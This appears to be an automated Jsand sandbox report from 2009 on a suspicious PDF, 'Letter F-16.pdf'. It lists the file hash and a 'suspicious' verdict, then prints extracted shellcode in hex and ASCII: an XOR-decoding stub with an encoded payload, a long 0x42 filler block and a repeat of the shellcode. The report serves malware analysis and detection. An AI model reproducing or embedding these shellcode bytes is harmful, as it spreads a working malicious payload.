Analysis report for Letter F-16.pdf
Sample Overview
| File | Letter F-16.pdf |
|---|
| MD5 | ca79bb9846a56e73f6df1bba7854d196 |
| Analysis Started | 2009-11-26 10:57:44 |
| Report Generated | 2009-11-26 10:57:47 |
| Jsand version | 1.03.02 |
Detection results
| Detector | Result |
| Jsand 1.03.02 | suspicious |
Warning:
- When analyzing a file (rather than a URL), Jsand does not examine external resources, such as iframes and scripts. In addition, properties such as document.location, document.referer, and document.cookie, which are sometimes used by malicious scripts, are not set.
This may affect the detection of malicious code.
Exploits
No exploits were identified.
Deobfuscation results
Evals
No evals.
Writes
No writes.
Network Activity
Requests
| URL |
| file://Letter F-16.pdf |
ActiveX controls
No objects/controls.
Shellcode and Malware
| Hexadecimal | ASCII |
41 43 49 4b eb 11 fc 5b 4b 33 c9 66 b9 b0 01 80
34 0b f9 e2 fa eb 05 e8 eb ff ff ff 11 f9 f9 f9
f9 a3 ac 72 15 78 15 9d fd f9 f9 72 0d 11 69 f8
f9 f9 72 01 11 16 f9 f9 f9 70 ff 06 cf 91 54 62
84 26 11 ed f8 f9 f9 70 bf f5 06 cf 91 d0 eb 3f
af 11 fc f8 f9 f9 70 bf e9 06 cf 91 a0 c5 fe 82
11 0f f9 f9 f9 70 bf ed 06 cf 91 87 21 1b 8a 11
1e f9 f9 f9 70 bf cd ca 30 12 fa 72 b7 c5 7a 38
fd a8 93 f9 a8 06 af f5 a0 7a 01 06 8d 09 c4 b9
e6 f9 f9 8f 10 70 b7 c5 93 f9 93 f9 93 f9 93 fb
93 f9 06 8f c5 06 af e9 70 bf bd 7a 01 f9 8d 32
93 f9 93 f9 93 f9 93 fd 06 8f bd 06 af ed 70 bf
b1 7a 01 f9 8d 4c 78 c1 dc a9 bd bf 72 b7 c5 8c
54 78 41 f9 eb f9 f9 a9 9d a9 bd 8c 58 78 41 fd
eb f9 f9 16 07 13 57 8c 6c 40 f9 ff f9 f9 78 15
f9 f1 f9 f9 af ae 72 09 78 3f e9 eb f9 f9 72 3d
7a 39 f1 72 01 0a 5d 40 f9 ff f9 f9 b0 b0 b0 b0
78 cd f1 17 07 07 16 7c 30 8c 08 a6 a7 06 8f c5
06 8f b1 06 8f bd 06 19 ac af 9d 58 c9 f9 f9 f9
7c 39 81 ea c7 72 b9 f5 c7 72 89 e5 c7 72 a7 f1
54 c7 72 91 f1 12 f4 c7 72 b9 cd c7 72 51 41 f9
f9 f9 ca 22 72 3c a7 a4 3b fd f9 aa ac af ae cf
72 95 dd e1 cf 72 bc c5 cf 72 ad fc 81 fa 2c c7
72 b3 e1 c7 72 a3 d9 fa 24 1a c5 b0 c7 72 cd 72
fa 0c ca 06 05 ca 39 55 c3 3d 8d fe 38 36 f4 fa
01 12 0b cf c2 85 dd ed 8c 26 72 3b 7a 39 dd c7
72 e1 fa 24 9f c7 72 f5 b2 c7 72 a3 e5 fa 24 c7
72 fd 72 fa 3c 12 fb ca 39 72 2c a6 a7 a4 a2 3b
f1 f9 11 f9 f9 f9 f9 a1 7a 39 fc 3a | ACIK...[K3.f....
4...............
...r.x.....r..i.
..r......p....Tb
.&.....p.......?
......p.........
.....p......!...
....p...0..r..z8
.........z......
.....p..........
........p..z...2
..............p.
.z...Lx.....r...
TxA.........XxA.
......W.l@....x.
......r.x?....r=
z9.r..]@........
x......|0.......
...........X....
|9...r...r...r..
T.r.....r...rQA.
..."r<..;.......
r....r...r....,.
r...r...$....r.r
......9U.=..86..
.........&r;z9..
r..$..r...r...$.
r.r.<...9r,....;
........z9.: |
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42
41 43 49 4b eb 11 fc 5b 4b 33 c9 66 b9 b0 01 80
34 0b f9 e2 fa eb 05 e8 eb ff ff ff 11 f9 f9 f9
f9 a3 ac 72 15 78 15 9d fd f9 f9 72 0d 11 69 f8
f9 f9 72 01 11 16 f9 f9 f9 70 ff 06 cf 91 54 62
84 26 11 ed f8 f9 f9 70 bf f5 06 cf 91 d0 eb 3f
af 11 fc f8 f9 f9 70 bf e9 06 cf 91 a0 c5 fe 82
11 0f f9 f9 f9 70 bf ed 06 cf 91 87 21 1b 8a 11
1e f9 f9 f9 70 bf cd ca 30 12 fa 72 b7 c5 7a 38
fd a8 93 f9 a8 06 af f5 a0 7a 01 06 8d 09 c4 b9
e6 f9 f9 8f 10 70 b7 c5 93 f9 93 f9 93 f9 93 fb
93 f9 06 8f c5 06 af e9 70 bf bd 7a 01 f9 8d 32
93 f9 93 f9 93 f9 93 fd 06 8f bd 06 af ed 70 bf
b1 7a 01 f9 8d 4c 78 c1 dc a9 bd bf 72 b7 c5 8c
54 78 41 f9 eb f9 f9 a9 9d a9 bd 8c 58 78 41 fd
eb f9 f9 16 07 13 57 8c 6c 40 f9 ff f9 f9 78 15
f9 f1 f9 f9 af ae 72 09 78 3f e9 eb f9 f9 72 3d
7a 39 f1 72 01 0a 5d 40 f9 ff f9 f9 b0 b0 b0 b0
78 cd f1 17 07 07 16 7c 30 8c 08 a6 a7 06 8f c5
06 8f b1 06 8f bd 06 19 ac af 9d 58 c9 f9 f9 f9
7c 39 81 ea c7 72 b9 f5 c7 72 89 e5 c7 72 a7 f1
54 c7 72 91 f1 12 f4 c7 72 b9 cd c7 72 51 41 f9
f9 f9 ca 22 72 3c a7 a4 3b fd f9 aa ac af ae cf
72 95 dd e1 cf 72 bc c5 cf 72 ad fc 81 fa 2c c7
72 b3 e1 c7 72 a3 d9 fa 24 1a c5 b0 c7 72 cd 72
fa 0c ca 06 05 ca 39 55 c3 3d 8d fe 38 36 f4 fa
01 12 0b cf c2 85 dd ed 8c 26 72 3b 7a 39 dd c7
72 e1 fa 24 9f c7 72 f5 b2 c7 72 a3 e5 fa 24 c7
72 fd 72 fa 3c 12 fb ca 39 72 2c a6 a7 a4 a2 3b
f1 f9 11 f9 f9 f9 f9 a1 7a 39 fc 3a | BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
ACIK...[K3.f....
4...............
...r.x.....r..i.
..r......p....Tb
.&.....p.......?
......p.........
.....p......!...
....p...0..r..z8
.........z......
.....p..........
........p..z...2
..............p.
.z...Lx.....r...
TxA.........XxA.
......W.l@....x.
......r.x?....r=
z9.r..]@........
x......|0.......
...........X....
|9...r...r...r..
T.r.....r...rQA.
..."r<..;.......
r....r...r....,.
r...r...$....r.r
......9U.=..86..
.........&r;z9..
r..$..r...r...$.
r.r.<...9r,....;
........z9.: |
No additional malware was retrieved.